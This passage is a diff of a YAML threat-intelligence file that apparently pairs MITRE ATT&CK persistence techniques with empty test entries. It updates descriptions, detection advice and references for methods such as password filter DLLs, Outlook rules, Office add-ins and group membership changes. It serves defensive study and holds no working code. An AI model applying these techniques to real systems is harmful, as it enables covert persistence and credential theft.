         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -28768,42 +29145,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1137.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
-      type: attack-pattern
-      created: '2019-11-07T19:52:52.801Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.006
-        url: https://attack.mitre.org/techniques/T1137/006
-      - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
-        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
-        source_name: Microsoft Office Add-ins
-      - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
-        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
-          Persistence. Retrieved July 3, 2017.
-        source_name: MRWLabs Office Persistence Add-ins
-      - source_name: FireEye Mail CDS 2018
-        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
-        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
-          Enterprise Email Compromise. Retrieved April 22, 2019.
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:37:09.190Z'
       name: 'Office Application Startup: Add-ins'
       description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
         on a compromised system. Office add-ins can be used to add functionality to
@@ -28818,13 +29164,18 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Modification'
@@ -28832,11 +29183,34 @@ persistence:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+      created: '2019-11-07T19:52:52.801Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/006
+        external_id: T1137.006
+      - source_name: FireEye Mail CDS 2018
+        description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+          Enterprise Email Compromise. Retrieved April 22, 2019.
+        url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+      - source_name: MRWLabs Office Persistence Add-ins
+        description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+          Persistence. Retrieved July 3, 2017.
+        url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+      - source_name: Microsoft Office Add-ins
+        description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+        url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.006
     atomic_tests: []
   T1505.002:
@@ -28867,7 +29241,7 @@ persistence:
         url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
         description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
           remote code execution. Retrieved June 24, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T17:05:44.321Z'
       name: 'Server Software Component: Transport Agent'
       description: "Adversaries may abuse Microsoft transport agents to establish
         persistent access to systems. Microsoft Exchange transport agents can operate
@@ -28905,13 +29279,11 @@ persistence:
       - SYSTEM
       - Administrator
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.002
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -28937,7 +29309,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -28979,7 +29351,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -29057,11 +29428,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29141,35 +29511,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -29193,71 +29538,60 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1505.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
-      created: '2022-03-28T15:34:44.590Z'
-      x_mitre_version: '1.0'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.005
-        url: https://attack.mitre.org/techniques/T1505/005
-      - source_name: James TermServ DLL
-        url: https://twitter.com/james_inthe_box/status/1150495335812177920
-        description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
-          2022.
-      - source_name: Microsoft System Services Fundamentals
-        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
-        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
-          Retrieved March 28, 2022.
-      - source_name: Microsoft Remote Desktop Services
-        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
-        description: Microsoft. (2019, August 23). About Remote Desktop Services.
-          Retrieved March 28, 2022.
-      - source_name: RDPWrap Github
-        url: https://github.com/stascorp/rdpwrap
-        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
-          Retrieved March 28, 2022.
-      - source_name: Windows OS Hub RDP
-        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
-        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
-          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:42.810Z'
+      name: 'Server Software Component: Terminal Services DLL'
       description: |-
         Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
 
         [Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service's DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in `%SystemRoot%\System32\`, is the default <code>ServiceDll</code> value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
 
         Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Server Software Component: Terminal Services DLL'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for changes to Registry keys associated with <code>ServiceDll</code> and other subkey values under <code>HKLM\System\CurrentControlSet\services\TermService\Parameters\</code>.
 
@@ -29266,24 +29600,56 @@ persistence:
         Monitor commands as well as  processes and arguments for potential adversary actions to modify Registry values (ex: <code>reg.exe</code>) or modify/replace the legitimate <code>termsrv.dll</code>.
 
         Monitor module loads by the Terminal Services process (ex: <code>svchost.exe -k termsvcs</code>) for unexpected DLLs (the default is <code>%SystemRoot%\System32\termsrv.dll</code>, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Command: Command Execution'
       - 'File: File Modification'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+      created: '2022-03-28T15:34:44.590Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/005
+        external_id: T1505.005
+      - source_name: James TermServ DLL
+        description: James. (2019, July 14). @James_inthe_box. Retrieved September
+          12, 2024.
+        url: https://x.com/james_inthe_box/status/1150495335812177920
+      - source_name: Microsoft System Services Fundamentals
+        description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+          Retrieved March 28, 2022.
+        url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+      - source_name: Microsoft Remote Desktop Services
+        description: Microsoft. (2019, August 23). About Remote Desktop Services.
+          Retrieved March 28, 2022.
+        url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+      - source_name: RDPWrap Github
+        description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+          Retrieved March 28, 2022.
+        url: https://github.com/stascorp/rdpwrap
+      - source_name: Windows OS Hub RDP
+        description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+          Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+        url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.005
     atomic_tests: []
   T1176:
     technique:
-      modified: '2024-04-18T23:22:37.874Z'
+      modified: '2024-09-12T19:48:15.871Z'
       name: Browser Extensions
       description: "Adversaries may abuse Internet browser extensions to establish
         persistent access to victim systems. Browser extensions or plugins are small
@@ -29375,8 +29741,8 @@ persistence:
         url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
       - source_name: Chrome Extension C2 Malware
         description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
-          get hacked by a Chrome extension. Retrieved November 22, 2017.'
-        url: https://kjaer.io/extension-malware/
+          get hacked by a Chrome extension. Retrieved September 12, 2024.'
+        url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
       - source_name: Catch All Chrome Extension
         description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
           Steals All Posted Data. Retrieved November 16, 2017.
@@ -29407,71 +29773,139 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1176
     atomic_tests: []
   T1137.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T16:02:26.206Z'
+      name: Outlook Rules
+      description: |-
+        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
       x_mitre_contributors:
       - Microsoft Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Application Log: Application Log Content'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
       created: '2019-11-07T20:00:25.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1137.005
         url: https://attack.mitre.org/techniques/T1137/005
-      - source_name: SilentBreak Outlook Rules
-        url: https://silentbreaksecurity.com/malicious-outlook-rules/
-        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
-          February 4, 2019.
+        external_id: T1137.005
+      - source_name: Pfammatter - Hidden Inbox Rules
+        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
       - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
         description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
           Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
           4, 2019.
-      - source_name: Pfammatter - Hidden Inbox Rules
-        url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
-        description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
-          Microsoft Exchange. Retrieved October 12, 2021.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SilentBreak Outlook Rules
+        description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+          February 4, 2019.
+        url: https://silentbreaksecurity.com/malicious-outlook-rules/
       - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
         description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
           provides blue teams with the ability to detect Ruler usage against Exchange.
           Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
-      name: Outlook Rules
-      description: |-
-        Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
-        Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+        url: https://github.com/sensepost/notruler
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_detection: |-
-        Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
-        Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
       x_mitre_data_sources:
-      - 'Process: Process Creation'
-      - 'Application Log: Application Log Content'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.011:
     technique:
@@ -29502,7 +29936,7 @@ persistence:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -29557,13 +29991,11 @@ persistence:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -29624,9 +30056,9 @@ persistence:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
